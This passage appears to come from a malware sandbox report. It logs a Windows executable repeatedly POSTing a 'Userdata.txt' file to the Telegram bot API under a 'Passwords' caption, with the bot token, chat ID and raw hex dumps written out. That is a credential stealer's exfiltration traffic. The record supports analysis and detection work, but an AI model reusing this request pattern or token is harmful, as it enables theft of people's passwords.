                                                                                                                2025-01-10 21:44:08 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43639,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545448,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                22192.168.2.650027149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:09 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd330e9e22c452
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:09 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 30 65 39 65 32 32 63 34 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd330e9e22c452Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:10 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:09 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:10 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 34 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43640,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545449,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                23192.168.2.650029149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:11 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd33226ffebf79
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:11 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 32 32 36 66 66 65 62 66 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd33226ffebf79Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:11 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:11 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:11 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43641,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545451,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                24192.168.2.650031149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:12 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd3334e233e59f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:12 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 33 34 65 32 33 33 65 35 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd3334e233e59fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:13 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:13 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:13 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43642,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545453,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                25192.168.2.650033149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:14 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd33489733ac2d
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:14 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 34 38 39 37 33 33 61 63 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd33489733ac2dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:14 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:14 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:14 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43643,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545454,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                26192.168.2.650035149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:16 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd335edc34d36f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:16 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 35 65 64 63 33 34 64 33 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd335edc34d36fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:16 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:16 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 543
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:16 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43644,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545456,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                27192.168.2.650037149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:17 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd3373c2fc3f18
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:17 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 37 33 63 32 66 63 33 66 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd3373c2fc3f18Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:18 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:17 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2025-01-10 21:44:18 UTC545INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 35 34 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":43645,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736545457,"document":{"file_n


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                28192.168.2.650039149.154.167.2204436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:44:19 UTC298OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary================8dd338b355bade0
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 1090
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:44:19 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 38 62 33 35 35 62 61 64 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                Data Ascii: --===============8dd338b355bade0Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                2025-01-10 21:44:19 UTC388INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Fri, 10 Jan 2025 21:44:19 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 545
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
